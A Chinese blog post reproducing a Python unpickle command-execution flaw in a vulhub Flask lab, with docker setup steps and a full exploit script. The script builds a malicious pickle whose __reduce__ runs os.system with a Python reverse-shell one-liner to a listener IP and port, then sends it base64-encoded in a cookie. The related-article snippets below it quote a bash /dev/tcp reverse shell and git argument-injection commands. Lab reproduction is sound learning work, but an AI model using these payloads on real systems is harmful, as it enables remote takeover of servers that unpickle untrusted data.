Python unpickle 造成任意命令执行漏洞

最新推荐文章于 2024-04-05 18:51:26 发布
最新推荐文章于 2024-04-05 18:51:26 发布
阅读量1k 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: python 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111824525
版权

声明

好好学习,天天向上

漏洞描述

影响范围

复现过程

这里使用1.1.1版本

使用vulhub

/app/vulhub-master/flask/ssti

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.239.129:8000

创建exp.py,内容如下,自行修改反弹shell的IP和端口

#!/usr/bin/env python3
import requests
import pickle
import os
import base64


class exp(object):
    def __reduce__(self):
        s = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.239.139",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'"""
        return (os.system, (s,))


e = exp()
s = pickle.dumps(e)

response = requests.get("http://192.168.239.129:8000/", cookies=dict(
    user=base64.b64encode(s).decode()
))
print(response.content)

kali监听6666端口后

执行

python3 exp.py

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
sklearn_msgpack:Scikit使用MsgPack学习模型持久性
05-16
Scikit通过MsgPack学习模型持久性 介绍 Scikit学习在训练后使用来存储模型 这种方法存在已知 安全性-泡菜包含字节码 可维护性-需要相同版本的sklearn 慢-因为它不仅包含经过训练的权重而包含字节码 UserWarning: Trying to unpickle estimator MLPClassifier from version 0.18 when using version 0.19.1. This might lead to breaking code or invalid results. Use at your own risk. 我们的方法 为了持久化模型实例,我们构造了一个包含以下内容的字典 用于构造实例的关键字参数 可训练参数的值(例如权重) 其他所需的实例属性 我们使用来存储此字典 受支持的课程 添加更多非常容易 表现 我们已经看到MLPC
Pickle_Unpickle.rar_Python_
08-09
序列化和反序列化处理,SQL数据库的用法实例代码
解决Stable Diffusion WebUI的embeddings训练报错
最新发布
2301_79954314的博客
04-05 282
命令行中加上--disable-safe-unpickle
python反序列化漏洞 任意代码执行
01-20
上一篇博客中我介绍了python的字符串,元组,列表和字典的序列化 详细请看: python序列化中的字符串,列表,字典,类的序列化解释 这篇博客我将介绍 python反序列化漏洞 任意代码执行 那么怎么反序列化中运行任意代码呢? 首先要说说__reduce__这个魔术方法, 这个方法用来表明类的对象应当如何序列化, 当其返回tuple类型时就可以实现任意代码执行 举个例子: import pickle import os class Student(object): name = 'yuaneuro' age = '20' def __reduce__(self):
avazu-spark:在kaggle中引发avazu竞赛的实施
07-23
阿瓦祖火花 在kaggle中引发avazu竞赛的实施 转换包base下的所有预处理python脚本时,将附带的avazu-base.tar解压到test目录下。 运行相应的 python 脚本并将输出与原始(已包含在 tar 中)进行比较。 数据准备涉及5个python脚本:gen_data.py、parallelizer.py、pickle_prediction.py、merge_prediction.py、unpickle_prediction.py ./util/gen_data.py ../tr.rx.csv ../va.rx.csv tr.rx.app.new.csv va.rx.app.new.csv tr.rx.site.new.csv va.rx.site.new.csv util/parallelizer.py -s 12 转换器/2.py tr.rx.app.new
stalecucumber:Golang中Python的pickle格式的读写器
05-10
过时的Cucumber 该程序包读取和写入腌制的数据。 格式与Python“ pickle”模块相同。 协议0,1,2已实现。 这些是Python 2.x系列编写的版本。 Python 3定义了较新的协议版本,但可以编写较旧的协议版本,因此此包可读取它们。 TLDR 读取腌制的字符串或unicode对象 pickle.dumps("foobar") --- var somePickledData io.Reader mystring, err := stalecucumber.String(stalecucumber.Unpickle(somePickledData)) 读取一个腌制的整数 pickle.dumps(42) --- var somePickledData io.Reader myint64, err := stalecucumber.Int(stalecucumber.
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1032
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
CVE-2017-8386_ GIT-SHELL 漏洞复现(vulhub)
MDSEC的博客
08-23 231
GIT (分布式版本控制系统),是一个开源的分布式版本控制系统,可以有效、高速地处理从很小到非常大的项目版本管理。也是Linus Torvalds为了帮助管理Linux内核开发而开发的一个开放源码的版本控制软件。GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。按住shife+e 输入你想要查看的文件 ,就可以查看文件。然后查看CVE-2017-8386下的文件。老样子,首先拉去镜像环境。执行chmod,修改属性。这样漏洞就复现完成了。
git CVE-2017-8386
weixin_37639863的博客
02-18 746
GIT-SHELL 沙盒绕过(CVE-2017-8386)_黑白的博客-CSDN博客声明好好学习,天天向上漏洞描述GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。影响范围复现过程使用vulhub/app/vulhub-master/git/CVE-2017-8386使用docker启动docker-compose builddocker-compose up -d先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compos
CVE-2017-8386 git沙盒绕过
m0_46580995的博客
10-17 474
vulhub的cve-2017-8386 sudo ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'" shift+e !+命令
rmi远程反序列化rce漏洞_[原创]CVE-2018-1297jmeter_RMI漏洞复现
weixin_31423955的博客
12-23 462
jmeter_RMI_CVE-2018-1297复现5ecurity团队(5ecurity.cn)成员 zzw(zzw@5ecurity.cn)原创发布
【vulhub】GIT-SHELL 沙盒绕过(CVE-2017-8386)漏洞复现
qq_45300786的博客
04-16 430
通过此命令达到文艺文件读取 ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'" 输入上图的ssh命令后,在这个界面同时按shift键和e键 然后输入想查看的文件 /etc/passwd 详细文章请参考 https://blog.csdn.net/m0_46580995/article/details/109136159 https://vulhub.org/#/environments/git/CVE-2017
git参数注入
公众号shadow sock7
09-30 777
向前一段时间出的Jenkins的git client插件的RCE(CVE-2019-10392)就是git ls-remote命令拼接导致的命令执行。 然后找了一些git的命令注入的例子: git-ls-remote git ls-remote -h --upload-pack=calc.exe HEAD 这个也是git-ls-remote命令的参数注入漏洞: https://snyk.io/...
Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)
锋刃科技的博客
06-17 2055
简介 Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。 环境搭建 cd /vulhub/jmeter/CVE-2018-1297 docker-compose up -d cat docker-compose.yml 可以看到开启的是1099端口 环境启动后,将启动一个RMI服务并监听1099端口。 下载ysoseria
Apache JMeter rmi 反序列化 cve-2018-1297
whatday的专栏
08-07 489
漏洞描述 Severity: Important Vendor: The Apache Software Foundation Versions Affected: JMeter 2.X, 3.X Description [0]: When using Distributed Test only (RMI based), jmeter uses an unsecured RMI connection. This could allow an attacker to get Access to JM
PIL-CVE-2017-8291
qq_48703517的博客
05-06 1011
打开靶场 192.168.71.141:8000打开 讲poc.png上传 以 docker exec –it 7dd /bin/bash 进入容器在tmp下找到poc.png 反弹shell bash –c “bash –i >& /dev/tcp/192.168.71.131/8888 0>&1” Kali启动监听 成功 ...
unpickle函数
07-28
unpickle函数是一个Python函数,用于从文件中反序列化(或解析)Python对象。它通常与pickle函数一起使用,pickle函数用于将Python对象序列化为二进制数据并保存到文件中,而unpickle函数则用于从文件中读取并恢复...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值